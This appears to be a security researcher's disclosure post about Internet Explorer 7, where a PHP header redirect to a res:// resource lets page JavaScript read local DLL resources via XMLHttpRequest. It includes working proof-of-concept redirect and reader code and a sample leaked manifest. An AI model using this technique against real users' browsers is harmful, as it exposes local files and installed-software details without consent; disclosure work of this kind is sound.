Internet Explorer 7 Header Forwards.

Abstract.

I mentioned this in one of my articles, and it seems that the res:// or the resource scheme in Internet Explorer has serious issues. This is known, it is also known that one can detect installed software through it, by linking a dynamic link library, an executable, and previously simply by an image[1]. Any software installed on a Windows platform might pose a security and privacy risk if files contain sensitive information. Any Windows file could be theoretically be found when the res scheme allows it. This article is about another issue of the res:// scheme, and why it should be bolted down by Microsoft.

Headers.

Internet Explorer 7 is sensitive for redirects to the file system. The res scheme has a long history, and Microsoft has never been able to mitigate the issues that surrounded it. While obeying header forwards can be a good thing, it is mandatory to check where they are going. You cannot assume a page goes to a happy place, and it seems that we can abuse it. A simple test is to setup a host with a PHP file and one HTML file with Javascript.

The attack vector.

By utilizing a simple PHP header forward, we can resource a local file:

<?php
header("location: res://ieframe.dll/24/123");
?>

With a simple XmlHttpRequest, we can read out the file that we requested.

<script>

var xml = new XMLHttpRequest();

xml.open("GET","/the_header_file.php");
 xml.onreadystatechange=function (){
    if (xml.readyState == 4){
     alert(xml.responseText)
   }
 }
xml.send(null);

</script>

The header forward succeeds, and the xml response gives us the information back. The information we get send back is an internal Internet Explorer configuration file, that might contain something similar like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?> 
<!--  Copyright (c) Microsoft Corporation --> 
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.InetCore.ieframe"processorArchitecture="x86" version="5.1.0.0" type="win32" /> 
<description>Windows IE</description> 
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32"name="Microsoft.Windows.Common-Controls"version="6.0.0.0" processorArchitecture="*" 
publicKeyToken="6595b64144ccf1df" language="*" /> 
</dependentAssembly>
</dependency>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" /> 
</requestedPrivileges>
</security>
</trustInfo>

<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware> 
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

Conclusion.

Naturally, this is a privacy issue. But maybe a security issue as well in the light of Named Pipes and that many files can be accessed through the res scheme[1]. It needs more investigation. Truth be told, it just sucks. It should not be possible at all and I do not see any legitimate use of it. Internet Explorer 8 seems to be secured from such technique.

References.

[1] http://www.xs-sniper.com/nmcfeters/URI_Use_and_Abuse.pdf